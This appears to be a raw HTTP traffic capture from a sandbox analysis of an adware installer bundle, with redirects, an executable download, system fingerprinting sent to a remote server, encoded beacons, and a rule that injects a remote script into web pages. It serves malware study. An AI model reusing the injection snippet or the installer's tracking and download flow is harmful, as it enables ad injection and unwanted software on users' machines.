Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>..HTTP/1.1 301 Moved Permanently..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:25 GMT..Content-Type: text/html..Content-Length: 185..Connection: keep-alive..Location: hXXp://VVV.4threquest.me/010914s/010914i.htm..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>....
GET /Bw14Po HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: goo.gl
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 23 Apr 2015 07:24:21 GMT
Location: hXXp://VVV.4threquest.me/registro/310113f8.htm
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 191
Server: GSE
Alternate-Protocol: 80:quic,p=1
GET /registro/top-line.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 1724
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:25 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
<<< skipped >>>
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
GET /services/rules.txt?dummy=534 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT
ETag: "5a246f5-10-50b4a12f3b440"
Accept-Ranges: bytes
Content-Length: 16
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:37 GMT
P3P: CP="Potato"
X-Cache: BYPASS
</body>|</body>
GET /services/update.php?v=1.0.0&key=DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw&dummy=112 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
inactive
GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:53 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.0.15</center>
</body>
</html>
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.wpm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}
0
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.ient HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.76 ms","message":"store 1 action and 0 update "}
0
GET /mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.14
Content-Length: 0
Connection: close
Content-Type: text/html
POST /tdownload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.downloadcrest.com
Content-Length: 106
Connection: Keep-Alive
version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec999268&t1=1429774025&campid=9664&prefix=amisetup5755
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup5755__9664.exe"
Content-Type: application/x-msdownload
Date: Thu, 23 Apr 2015 07:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup5755__9664.exe
Content-Length: 1397248
Connection: keep-alive
MZ ... !This program cannot be run in DOS mode. ... PE (Win32 PE executable, 1397248 bytes; sections visible in the dump: .textbss .text .rdata .data .idata .rsrc .reloc; binary data omitted)
<<< skipped >>>
GET /services/rules?dummy=212 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:15 GMT
Content-Type: text/plain
Content-Length: 265
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT
ETag: "5d60ef-109-50e71dec37cc0"
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:15 GMT
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</body>|<script>var cb_instID='{instID}';cbS=document.createElement("script");cbS.setAttribute("type","text/javascript");cbS.setAttribute("src", "hXXp://related.deals/services/load.js");document.body.appendChild(cbS);</script></body>
{cashReminder_instID}|{instID}
<<< skipped >>>
GET /services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:16 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:03 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
GET /mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:07 GMT
Content-Length: 2004
hHqI6zfbRv25fbMBtZdokyLM4zjRbdf8fOBN3rshiiPI73aYRt2PU5RA75EbynCf/hrAVPTjZ/sVutNU/EOYmASoOp pdaZ5wKogpyad0HGqCs3vKdQmjsJ0nnj /H7CXZa3IM0UzswFw23qvDuNfofgDthQ vsg0DyM5GXUe5K6Ha8t2P1vkHrC8nCuJbzWYLg3yuMtxwyFwmSpBoD/et5ogeEgiEXc2gbEbIbnMIkwzutXllmuuCbcbtPzY8R6ufcK CGe5TvcJoL8JrE6q5c/1B712QyAY8/XZrZMmKM54WKXpGyVU8rDCNp7 IEGmjPe6wjHHJu2K8E4hvUznT2yuh2vLbSmbIA0lLAnpCbil2COJtvpL8cru8Zrt0GYo3XHd4jhIIdZys4M GnQtCCNH9XrGN8e7L8kxD MqzPYbKCsHqgs2P1nhHrdu37qL7bUZoJ0hP4p1yqQi3zgTd67IYsqyO92mEbdj1OUQO OAcpwn/4awFT042f7NZruf8V6trUQtjumm1KRZMewNbto4pdzlzrL7xXDIoiFPaxR1vU3kH6cvWeCQt3JP9dk0bh00jLI4heYHrC2N8spp Zl2GmhmBm/K5HlO4N3wq035GinxmGBOczueZgpjMt0pwiY/GPTeJDvOJVEzcgUmnOGtDLKZoS8V5ZIr6kginbLz1riSOb3U6opjq8j3zT9pyGhJLrQd5g30vkH/g6Y02iQUdTqOZ45kqxulFP2zATTKp6zI4QwkawezEyzujHNKL/mfcR65uEfrySW6yODedy9N4YrutxzkxXW7zjJbdfBZq5X37U522iAum2TUpqXD9dk17h6yjnF7xjAHuytN90plKtqk3ag Uvje9bldZxmy/xo6gKF5lLUepz6OtYnz50lkV3J8HXGfpajY41F5PE5xGfHmSOFLJ iWcJduqwg5i2E4jOLcbG3HfZqn79xgHXauzaeK6LAYNRs0P83zmPPwWiwR9/XesZykqhBiVPbxkuMbsWxJY1wn cI0Eu5qyGKdo/mfcJ66PkUoimZsyPfYtyrN7VmtZdsknSEs2 ObZned6cGgLtT Uiz7y7DRtnZAZQyhpA/iy7S/RTSSIqFEsEijehmwkOYmASoOp pdbNz3K07pySS6VCYP9D5L8Mjgftbg0rO8FfdfIOocMMamtsI2n3BkzeFOZ 0FcFQuvVnzTSZ4nLFeqCNELY9n U7i2PCsn7qLKHHZpMY3/4y1Cquz2KhT5ijfdN3l6guw1/LyR7ZesD/bI490f0emB6zoSTLOMu9ZcNqoaZdoWqToyPfJ57sfuo t8Vg1GycwhDxGM LJbJFzvE5iDmppGGTWcvCD8JU Io/hjjS QjoYJWsN9oph/NH1G23sh60FKaSb4x43aozpCaS6VKfJNv5M8M9hoUr4FLb9W7XVYWgZ8MM1tgF2iSGuC6YOd76HtBqt7UwzW7T6WTdc j5F7U6maJPhGLHqDeLIqvWbtRs2Os30SrBhW6xQM32adY53qtjjUXdgUvTcMW Ispm
<<< skipped >>>
GET /fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:20 GMT
Content-Length: 0
GET /ii?alpha=U2xSOyMpaRAdPUgWfREsUigBNiNTMF4TLnZUE29sDGkDO3dGUF8tEQB3EC0RXjwOMAgQDGV/NA0TV2o3VjgrJVU5cBEhOwMzQT50KXp9FixQITs5KQYpBhVhM0EHdDhdP3peIQISTzxPJVtTOXR6fEocLiAYIU1jSWh3FTxTSFs4JCszViohFHZJPHYuaTpVJQ9xUnR+RmwHRSUzVgUvTRdiA3RzTlAOEg8EOBpoJH04CAhSVQQ8J2NGagN5MFM4LC0CaDFseHYPVScoKWwobRV0HBcNNCsaLkRbMyYATStmEStRbmBTUl8wFAJsEX4tWT5HCQYNTmN+Il8CY3dVFGZ4bhZ+N095dF4gAms0bDV7CzEbYFF0fltrAUcjNUEFO3kMbls9ZldDCV1HQS1QPWRQOQs/AQQXSWc2EzNAPyVOXHBiEWg6AERhU3QRfW85MmJYJQcuVipyDH9WAS4sAkx4P1crU3wrBhBYTT5bLEc3cXlwJGdVUBoqeT4bZ3U2aRVsOG8KYDAdU1ttTjUoInAxd1hVYh8qG2kRLQohXmJTEiwvM2RMaWNXTEI0OSQ+NmwwW2ojLAYVTyp5OkJ8VjlmWzg4cVg8QyJiPCYQEA== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:21 GMT
Content-Length: 84
UDRT22FabhHfFE9XbqcgVnkRz35UOxTWE1k4NYthRCBNkXYPFhbxU05kEohzT3MB2w9aHHiFfwGZVo8qEok6
POST /if?alpha=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 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache
alpha=WmVjOTkBcgl8RWo/Zl1XbAYWDRg5LjcpaHhWDQdaL0VDTHIOdQcaChhLJmM/X1REKGAneA==
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:22 GMT
Content-Length: 41
{"status":"OK","url":null,"message":null}
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.regok HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.72 ms","message":"store 1 action and 0 update "}
0
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.finish HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.66 ms","message":"store 1 action and 0 update "}
0
GET /s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a (43-byte GIF image; binary data omitted)
GET /v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2105 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.82 ms","message":"store 2 action and 4 update "}
0
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.RegWrite HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.65 ms","message":"store 1 action and 0 update "}
0
POST /namen.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.amoninst.com
Content-Length: 70
Connection: Keep-Alive
campid=9664&i=MyBestOffersTodayBR&prefix=amisetup5755&version=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 171
Connection: keep-alive
[Data]
exe=amisetup5755.exe
url=hXXp://VVV.downloadcrest.com/tdownload.php
params=version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec999268&t1=1429774025&campid=9664
GET /install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Thu, 23 Apr 2015 07:24:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 693
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<h1>404 Not Found</h1>
<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>
Please report this message and include the following information to us.<br/>
Thank you very much!</p>
<table>
<tr>
<td>URL:</td>
<td>hXXp://log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001</td>
</tr>
<tr>
<td>Server:</td>
<td>us-pub00.v9.com</td>
</tr>
<tr>
<td>Date:</td>
<td>2015/04/23 02:24:30</td>
</tr>
</table>
<hr/>Powered by Tengine/1.2.2
</body>
</html>
GET /s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:23:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a (43-byte GIF image; binary data omitted)
GET /mobile/mt-core.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:57 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT
ETag: "1448627-161ce-49dac90326480"
Accept-Ranges: bytes
Content-Length: 90574
Connection: close
Content-Type: application/x-javascript
/*
---
MooTools: the javascript framework

web build:
 - hXXp://mootools.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7

packager build:
 - packager build Core/Core Core/Array Core/String Core/Number Core/Function Core/Object Core/Event Core/Browser Core/Class Core/Class.Extras Core/Slick.Parser Core/Slick.Finder Core/Element Core/Element.Style Core/Element.Event Core/Element.Dimensions Core/Fx Core/Fx.CSS Core/Fx.Tween Core/Fx.Morph Core/Fx.Transitions Core/Request Core/Request.HTML Core/Request.JSON Core/Cookie Core/JSON Core/DOMReady Core/Swiff

copyrights:
 - [MooTools](hXXp://mootools.net)

licenses:
 - [MIT License](http://mootools.net/license.txt)

...
*/
(function(){this.MooTools={version:"1.3.1",build:"af48c8d589f43f32212f9bb8ff68a127e6a3ba6c"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family){return i.$family();
}if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else{if(typeof i.length=="number"){if(i.callee){return"arguments";
}if("item" in i){return"collection";}}}return typeof i;};var u=this.instanceOf=function(w,i){if(w==null){return false;}var v=w.$constructor||w.constructor;
while(v){if(v===i){return true;}v=v.parent;}return w instanceof i;};var f=this.Function;var r=true;for(var q in {toString:1}){r=null;}if(r){r=["hasOwnProperty","valueOf","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","constructor"];
}f.prototype.overloadSetter=function(v){var i=this;return function(x,w){if(x==null){
<<< skipped >>>
GET /registro/carregando.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:39 GMT
Content-Type: image/gif
Content-Length: 4176
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:39 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a (4176-byte animated GIF with NETSCAPE2.0 extension and comment "Created with ajaxload.info"; binary image data omitted)
<<< skipped >>>
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.amoninst.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 309
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=9664&exe=amisetup5755__9664&ffver=&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1429773854&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:25 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
15d1.... .. ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=UTF-8" /> ..<title>Installer</title>..<base href="hXXp://VVV.amoninst.com:80/index.php" />..<script type="text/javascript" src="hXXp://cdn1.downloadcrest.com/V19/amipb.js"></script>..<script type="text/javascript">..var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';..var g_finish_install_button = '0';..var g_popup_install_all = '0';..var g_eula = ''; ..var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3';..var g_icon = '';..var g_comps = [], g_pages = [], c, g_curPage = -1;..var g_cid = '9664';..var g_tid = '';..var g_cc = 'UA';..var g_lang = 'en';..var g_ip 